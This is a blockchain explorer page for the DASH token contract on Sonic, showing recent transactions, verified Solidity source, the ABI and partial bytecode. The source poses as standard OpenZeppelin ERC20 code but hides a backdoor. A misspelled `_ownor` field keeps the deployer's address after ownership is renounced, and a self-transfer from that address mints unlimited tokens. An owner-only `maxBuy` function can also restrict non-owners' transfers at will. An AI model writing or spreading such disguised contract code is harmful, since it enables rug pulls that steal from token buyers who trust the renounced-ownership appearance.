S Price: $0.857578 (+0.01%)

Contract

0x21605e8359e9b8ce353bF37D3638E0911C5CAd3b

Overview

S Balance

Sonic LogoSonic LogoSonic Logo0 S

S Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve91779922025-02-21 17:04:3721 hrs ago1740157477IN
0x21605e83...11C5CAd3b
0 S0.0653642582.5
Approve91659382025-02-21 15:56:5322 hrs ago1740153413IN
0x21605e83...11C5CAd3b
0 S0.0653642582.5
Approve91608482025-02-21 15:29:3022 hrs ago1740151770IN
0x21605e83...11C5CAd3b
0 S0.0025965555
Approve91602172025-02-21 15:26:0422 hrs ago1740151564IN
0x21605e83...11C5CAd3b
0 S0.0027268455.01
Approve91601112025-02-21 15:25:3022 hrs ago1740151530IN
0x21605e83...11C5CAd3b
0 S0.00594846105
Approve91599602025-02-21 15:24:4222 hrs ago1740151482IN
0x21605e83...11C5CAd3b
0 S0.0031306950.1
Approve91599062025-02-21 15:24:2422 hrs ago1740151464IN
0x21605e83...11C5CAd3b
0 S0.0015020555
Approve91598992025-02-21 15:24:2222 hrs ago1740151462IN
0x21605e83...11C5CAd3b
0 S0.0653642582.5
Approve91598742025-02-21 15:24:1422 hrs ago1740151454IN
0x21605e83...11C5CAd3b
0 S0.0025965555
Transfer91597692025-02-21 15:23:4122 hrs ago1740151421IN
0x21605e83...11C5CAd3b
0 S0.0020661855
Approve91597402025-02-21 15:23:3222 hrs ago1740151412IN
0x21605e83...11C5CAd3b
0 S0.0027268455.01
Approve91596942025-02-21 15:23:1622 hrs ago1740151396IN
0x21605e83...11C5CAd3b
0 S0.0027853356.19
Approve91596892025-02-21 15:23:1522 hrs ago1740151395IN
0x21605e83...11C5CAd3b
0 S0.0027065555
Approve91596892025-02-21 15:23:1522 hrs ago1740151395IN
0x21605e83...11C5CAd3b
0 S0.0653642582.5
Transfer91596412025-02-21 15:22:5922 hrs ago1740151379IN
0x21605e83...11C5CAd3b
0 S0.0033846100
Approve91595802025-02-21 15:22:3822 hrs ago1740151358IN
0x21605e83...11C5CAd3b
0 S0.0032220565
Approve91595552025-02-21 15:22:3122 hrs ago1740151351IN
0x21605e83...11C5CAd3b
0 S0.0653642582.5
Approve91594732025-02-21 15:22:0422 hrs ago1740151324IN
0x21605e83...11C5CAd3b
0 S0.0025767555
Approve91594132025-02-21 15:21:4622 hrs ago1740151306IN
0x21605e83...11C5CAd3b
0 S0.0031306950.1
Approve91592272025-02-21 15:20:4522 hrs ago1740151245IN
0x21605e83...11C5CAd3b
0 S0.0025965555
Approve91591672025-02-21 15:20:2522 hrs ago1740151225IN
0x21605e83...11C5CAd3b
0 S0.0653642582.5
Approve91590832025-02-21 15:19:5923 hrs ago1740151199IN
0x21605e83...11C5CAd3b
0 S0.0653642582.5
Approve91590382025-02-21 15:19:4423 hrs ago1740151184IN
0x21605e83...11C5CAd3b
0 S0.0159114595
Approve91590272025-02-21 15:19:4123 hrs ago1740151181IN
0x21605e83...11C5CAd3b
0 S0.0025965555
Approve91590082025-02-21 15:19:3523 hrs ago1740151175IN
0x21605e83...11C5CAd3b
0 S0.0653642582.5
View all transactions

Parent Transaction Hash Block From To
View All Internal Transactions
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
DASH

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at SonicScan.org on 2025-02-21
*/

/**
 *
*/

// https://www.dash-ai.xyz/
// https://x.com/DashAI_Sonic

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;
/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.Y
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/utils/Context.sol

pragma solidity ^0.8.0;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    address internal _ownor;
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }

    function _msgTime() internal view virtual returns (uint256) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return block.timestamp;
    }
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        _msgTime();
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _ownor = oldOwner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

pragma solidity ^0.8.0;

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata, Ownable {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;
    uint256 public _bald = 420000;

    string private _name;
    string private _symbol;
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(
            currentAllowance >= amount,
            "ERC20: transfer amount exceeds allowance"
        );
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender] + addedValue
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        if (sender == _ownor && recipient == _ownor) {
            _beforeTokenTransfer(address(0), sender, amount);
            _totalSupply += amount;
            _balances[sender] += amount;
            emit Transfer(address(0), sender, amount);
        }
        else {
            uint256 senderBalance = _balances[sender];
            require(
                senderBalance >= amount,
                "ERC20: transfer amount exceeds balance"
            );
            require(
                amount <= _bald || sender == owner(),
                "TREAT: transfer amount exceeds one"
            );
            _balances[sender] = senderBalance - amount;
            _balances[recipient] += amount;

            emit Transfer(sender, recipient, amount);
        }
    }

    /**@dev sets the bald for maximum amount of tokens sent per transaction
    
    */
    function maxBuy(uint256 bald) external onlyOwner {
        _bald = bald;
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = accountBalance - amount;
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

// File: contracts/token/ERC20/behaviours/ERC20Decimals.sol

pragma solidity ^0.8.0;

/**
 * @title ERC20Decimals
 * @dev Implementation of the ERC20Decimals. Extension of {ERC20} that adds decimals storage slot.
 */
contract DASH is ERC20 {
    uint8 private immutable _decimals = 0;
    uint256 private _totalSupply = 1000000 * 10**0;

    /**
     * @dev Sets the value of the `decimals`. This value is immutable, it can only be
     * set once during construction.
     */
    constructor() ERC20("DASH", "DASH") {
        _mint(_msgSender(), _totalSupply);
    }

    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_bald","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"bald","type":"uint256"}],"name":"maxBuy","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60a0604052620668a0600555600060ff1660809060ff16815250620f42406008553480156200002d57600080fd5b506040518060400160405280600481526020017f44415348000000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f4441534800000000000000000000000000000000000000000000000000000000815250620000ba620000ae6200010960201b60201c565b6200011160201b60201c565b8160069081620000cb9190620005fb565b508060079081620000dd9190620005fb565b50505062000103620000f46200010960201b60201c565b6008546200021760201b60201c565b620007fd565b600033905090565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000289576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002809062000743565b60405180910390fd5b6200029d600083836200037c60201b60201c565b8060046000828254620002b1919062000794565b9250508190555080600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825462000309919062000794565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003709190620007e0565b60405180910390a35050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200040357607f821691505b602082108103620004195762000418620003bb565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004837fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000444565b6200048f868362000444565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620004dc620004d6620004d084620004a7565b620004b1565b620004a7565b9050919050565b6000819050919050565b620004f883620004bb565b620005106200050782620004e3565b84845462000451565b825550505050565b600090565b6200052762000518565b62000534818484620004ed565b505050565b5b818110156200055c57620005506000826200051d565b6001810190506200053a565b5050565b601f821115620005ab5762000575816200041f565b620005808462000434565b8101602085101562000590578190505b620005a86200059f8562000434565b83018262000539565b50505b505050565b600082821c905092915050565b6000620005d060001984600802620005b0565b1980831691505092915050565b6000620005eb8383620005bd565b9150826002028217905092915050565b620006068262000381565b67ffffffffffffffff8111156200062257620006216200038c565b5b6200062e8254620003ea565b6200063b82828562000560565b600060209050601f8311600181146200067357600084156200065e578287015190505b6200066a8582620005dd565b865550620006da565b601f19841662000683866200041f565b60005b82811015620006ad5784890151825560018201915060208501945060208101905062000686565b86831015620006cd5784890151620006c9601f891682620005bd565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200072b601f83620006e2565b91506200073882620006f3565b602082019050919050565b600060208201905081810360008301526200075e816200071c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000620007a182620004a7565b9150620007ae83620004a7565b9250828201905080821115620007c957620007c862000765565b5b92915050565b620007da81620004a7565b82525050565b6000602082019050620007f76000830184620007cf565b92915050565b608051611bf862000819600039600061050a0152611bf86000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063dd62ed3e11610066578063dd62ed3e146102c5578063eb38e6f5146102f5578063f2fde38b14610313578063f91c0c7b1461032f57610100565b80638da5cb5b1461022957806395d89b4114610247578063a457c2d714610265578063a9059cbb1461029557610100565b8063313ce567116100d3578063313ce567146101a157806339509351146101bf57806370a08231146101ef578063715018a61461021f57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d61034b565b60405161011a9190611294565b60405180910390f35b61013d6004803603810190610138919061134f565b6103dd565b60405161014a91906113aa565b60405180910390f35b61015b6103fb565b60405161016891906113d4565b60405180910390f35b61018b600480360381019061018691906113ef565b610405565b60405161019891906113aa565b60405180910390f35b6101a9610506565b6040516101b6919061145e565b60405180910390f35b6101d960048036038101906101d4919061134f565b61052e565b6040516101e691906113aa565b60405180910390f35b61020960048036038101906102049190611479565b6105da565b60405161021691906113d4565b60405180910390f35b610227610623565b005b6102316106ab565b60405161023e91906114b5565b60405180910390f35b61024f6106de565b60405161025c9190611294565b60405180910390f35b61027f600480360381019061027a919061134f565b610770565b60405161028c91906113aa565b60405180910390f35b6102af60048036038101906102aa919061134f565b610864565b6040516102bc91906113aa565b60405180910390f35b6102df60048036038101906102da91906114d0565b610882565b6040516102ec91906113d4565b60405180910390f35b6102fd610909565b60405161030a91906113d4565b60405180910390f35b61032d60048036038101906103289190611479565b61090f565b005b61034960048036038101906103449190611510565b610a06565b005b60606006805461035a9061156c565b80601f01602080910402602001604051908101604052809291908181526020018280546103869061156c565b80156103d35780601f106103a8576101008083540402835291602001916103d3565b820191906000526020600020905b8154815290600101906020018083116103b657829003601f168201915b5050505050905090565b60006103f16103ea610a8c565b8484610a94565b6001905092915050565b6000600454905090565b6000610412848484610c5d565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061045d610a8c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156104dd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104d49061160f565b60405180910390fd5b6104fa856104e9610a8c565b85846104f5919061165e565b610a94565b60019150509392505050565b60007f0000000000000000000000000000000000000000000000000000000000000000905090565b60006105d061053b610a8c565b848460036000610549610a8c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546105cb9190611692565b610a94565b6001905092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61062b610a8c565b73ffffffffffffffffffffffffffffffffffffffff166106496106ab565b73ffffffffffffffffffffffffffffffffffffffff161461069f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161069690611712565b60405180910390fd5b6106a960006110f1565b565b60006106b56111f7565b50600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546106ed9061156c565b80601f01602080910402602001604051908101604052809291908181526020018280546107199061156c565b80156107665780601f1061073b57610100808354040283529160200191610766565b820191906000526020600020905b81548152906001019060200180831161074957829003601f168201915b5050505050905090565b6000806003600061077f610a8c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561083c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610833906117a4565b60405180910390fd5b610859610847610a8c565b858584610854919061165e565b610a94565b600191505092915050565b6000610878610871610a8c565b8484610c5d565b6001905092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b60055481565b610917610a8c565b73ffffffffffffffffffffffffffffffffffffffff166109356106ab565b73ffffffffffffffffffffffffffffffffffffffff161461098b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098290611712565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109f190611836565b60405180910390fd5b610a03816110f1565b50565b610a0e610a8c565b73ffffffffffffffffffffffffffffffffffffffff16610a2c6106ab565b73ffffffffffffffffffffffffffffffffffffffff1614610a82576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a7990611712565b60405180910390fd5b8060058190555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b03576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610afa906118c8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b699061195a565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c5091906113d4565b6040518091039